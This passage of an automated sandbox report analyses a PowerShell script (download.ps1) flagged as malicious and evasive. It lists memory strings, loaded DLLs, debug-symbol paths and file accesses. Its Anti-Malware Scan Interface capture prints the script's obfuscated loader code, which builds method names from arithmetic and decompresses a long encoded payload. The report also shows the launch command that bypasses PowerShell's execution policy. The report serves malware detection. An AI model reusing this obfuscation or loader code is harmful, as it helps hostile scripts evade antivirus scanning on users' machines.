e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="epDluNOoLrVXEHvCsvkULQ">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJw/rs\x3dACT90oF1BL3ZlaLO9UErlKWVa-MwNL-zZw',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="epDluNOoLrVXEHvCsvkULQ">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.1792974672.000001E28194A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basejs:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qAX
Source: powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E290228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E281795000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E290001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: else top.location='/doodles/';};})();</script><input value="AL9hbdgAAAAAZ2li0g-5EmraK5prsc5uRuzksKioNh82" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en&amp;authuser=0">Advanced search</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="epDluNOoLrVXEHvCsvkULQ">(function(){var a,b="1";if(document&&document.getElementById)if(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2024 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="epDluNOoLrVXEHvCsvkULQ">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="epDluNOoLrVXEHvCsvkULQ">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJw/rs\x3dACT90oF1BL3ZlaLO9UErlKWVa-MwNL-zZw',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="epDluNOoLrVXEHvCsvkULQ">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u=/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,dX
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg'
Source: classification engineClassification label: mal60.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6644:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yjrg43zi.yqe.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $pxso79gauievdqb.(([system.String]::new(@((166361/2483),(384171/(1130+2331)),(-5258+5370),(-7731+(10041-2189)),(7604-(19597120/2606)),(8753-8642)))))( $c3f8zdw7rg5ahto ) $pxso79gauievdqb.(([system.String]::new(@((9352-(37177140/4004)),(456192/4224),(-6769+(80+6800)),(-208+(-6187+(597+(14068-8155)))),(-6569+6670)))))()$nhvut5xwzaj3rgy.(([system.String]::new(@((237917/3551),(1085616/10052),(4015-(5446-(9650-8108))),(-8412+8527),(617918/(3034528/496))))))()[byte[]] $tos490z6qg18jkv = $c3f8zdw7rg5ahto.((-join (@((491400/(15110-(25233500/2725))),(996558/8978),(15925/(9664-(19354-9935))),(311448/(11471-(11931-3192))),(6658-6544),(49761/513),(-3536+(21905430/5990)))| ForEach-Object { [char]$_ })))() $q9lpzry8nioak2v=$tos490z6qg18jkv return $q9lpzry8nioak2v}[System.Text.Encoding]::ascii.((-join (@((2523-2452),(-4317+(-1948+(-780+7146))),(-7269+(14457-(12786-(44946324/7866)))),(989-(-3172+4078)),(-7895+(10112-(7645-5544))),(9469-(95570680/(52602184/(17939116/(17200508/(9048-4111)))))),(-2810+2915),(-3634+(24452064/(1012+(5828064/(2011-(10680-9725)))))),(462882/(14147-(19277-9624))))| ForEach-Object { [char]$_ })))((o1kytfw9q8rhup2gsci3j65vdmx "ePppNXh3aTRmbsmsPB58Ygry9hcikY33BxevfDfcnskAL6Q39D3/B3sTd8YCZm0aejr1HSrVwZ+PkfJYsp8ipMKv23NUSjJ5EJ48jhKiM2G32QPq0Y7vK+XpFkselIHAWM1f7EcJE02NBpNBmJG00LGOsLeR3afKvLracreoNahdEhvNi6+Xio7gmktdkafO1JbOG49gloxe0BDCFQYGzok6h1iFSYsQAOqMqs+sN35oALWRNy3vi1Te7Yq5kwXsPD2SA4CbE14PZ60wmkkEYrO1pk+rMvpUlc+HUCM05ufUm6BapcMMkMAOgo2qofksi7f+ChWQf3b7NOBiqJE4RrdWgSNflljCj0K+0ezEd2r4GVBLXAp2xrxIV8HL6nTxqlMK3EQaJ/G1x6oBMb9ufiUtRqWNEpp2+Hj8mJJ8dq6JX7kSkGmmr/L8Bx5cBiFErc8sbdmGJESYrVkKAwzchZq1XAsPkBZJlu6mOma4Fsucp5L2gpem+A94dys9slPN2LyuDjQZtkkVkVIhadCY6c3wOz8ZZrJ6vFuixQ1/BR/UPD++AthIo1M0/KSJqrkJsmmd9/KUkU3OH0aerj9cY3Rv8zh6E8Oi0veLrpvv/yrRvXkCwLezwPfZxgHmx1oMZ2zXA1Q0pOyrHeivFt9Q77uvHambP2RES7CPo+sEGjq/nxkeOdZ9Zq8RS1NXF4uN+r8HzaBoloy5EJvFurqqyMtMlozeVlVME466WreBBsTfo1rQrcwzKjM+M34u1AP9yhmkazf+xP5xTddfEpCV+HRbtHm6SrUGHk4aqTdRoBmtU3nassoxNnO7WMZ+8d9aR/ZZWit9F95f93eCN8sv7B2rR0dhXXd5pq8890mUi0mTGFksKxyAU7mZfMXE69NaxkgZqHhZ/ha0Ntzbnbl57d+OUE8p8g25Eb/WWsULGkabjp3Bj4OD4AaAitk5kZ7UMjEO04X8pOVtqcsYkE4OS0QNkcyX1ZHkkLayiLVh5kDLCJCxZJWp1xapi673/R0zvKyswm+MipMVWVNIgfcb51+A+q+buC776tnqt/wh0rGcWBv54dFC/0mS3Rm/wvZrNAHWBSQBsP6n1T+vYf5G+NTaJ40XK1Op60RZgX0wZF2UU3Yfm6MrjBl54BSS+9Qwx5W9qPh2KsaudLFZu6j08eIvABPQnyhykaVZToWJuplwqtnTJ01xrxVdhVVFamj8bXmpg7u67MWdv7/AqC6M6kQJkdqnp6nu2twA2IdJUm2BEZ8eoS/itZpNF+FPCAqLpDzfrb93UElUuY4gZub4NwZe5noaJmxCDMD5MFBHKp1coFFBUHG7YuV1R/RdcDxXAL+EL3WT0UqE0vAQ82YO1Un37JTqfyzCgf8dl5i28VdO4H/RJu09XV1aqXDTBr/l9SL9xxEHDB28bsSS5ZIUqu0zE5yMKIjoV7N9b+KV6Rkg7scVN7fARLzOPjMmhCiDcK0HruS1fYSUVmeXtd4zfXdKpOl5ho0jQns9JslAPEccjy2fH+nONj9qzyWO3104cfbdVbF2241HWYmp0lsdojUTKqXbWlCOdZp3i0QHMp9wTDU4/3tEuHyzm1KwfqWFQs5h9QYX3dsvcOOSFrzkau7s+Uz37lsvPEGkp5SXDnrVDQao4ezl6aNtUquDxdo1bdctBsZUtbp/8uaaflFyuAHeuILyX2v2LX+31AAgtI7UrLYVyXSrU+hbsBlpdxAZLY+7hVOX/P9BQ7gDngARRrV52rRZ+KZkCgP3LbRmmAUjP7K6UzB7JE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: mscorlib.pdbCLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.1826242579.000001E2F6C22000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1828378406.000001E2F8CE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbSq$$u source: powershell.exe, 00000000.00000002.1831734156.000001E2F907F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb} source: powershell.exe, 00000000.00000002.1832085428.000001E2F90F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tomation.pdbue source: powershell.exe, 00000000.00000002.1829931432.000001E2F8F71000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 31bf3856ad364e35corlib.pdb source: powershell.exe, 00000000.00000002.1829931432.000001E2F8F71000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.1832557825.000001E2F9338000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbM# source: powershell.exe, 00000000.00000002.1829931432.000001E2F8F71000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbG source: powershell.exe, 00000000.00000002.1832085428.000001E2F90F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1832557825.000001E2F9338000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1829931432.000001E2F8F71000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1832085428.000001E2F90F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1826242579.000001E2F6C22000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1828378406.000001E2F8CE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbh{ source: powershell.exe, 00000000.00000002.1826242579.000001E2F6C22000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B9BD2A5 pushad ; iretd 0_2_00007FFD9B9BD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BAD00BD pushad ; iretd 0_2_00007FFD9BAD00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BBAB353 push ss; iretd 0_2_00007FFD9BBAB382
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BBA8AA0 push FD9BCFDBh; iretd 0_2_00007FFD9BBA8AC2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BBA7A05 push es; ret 0_2_00007FFD9BBA7A17
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BD57854 push FD9BCF30h; iretd 0_2_00007FFD9BD5795A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BD857F4 push FD9BCF37h; iretd 0_2_00007FFD9BD85912
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BD83DD5 push eax; iretd 0_2_00007FFD9BD84291
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BD8350A push FD9BCF19h; iretd 0_2_00007FFD9BD8353A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BD86CC3 push FD9BCF6Eh; iretd 0_2_00007FFD9BD86CF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BD86CC3 push edx; iretd 0_2_00007FFD9BD86DCB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BD84288 push eax; iretd 0_2_00007FFD9BD84291

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
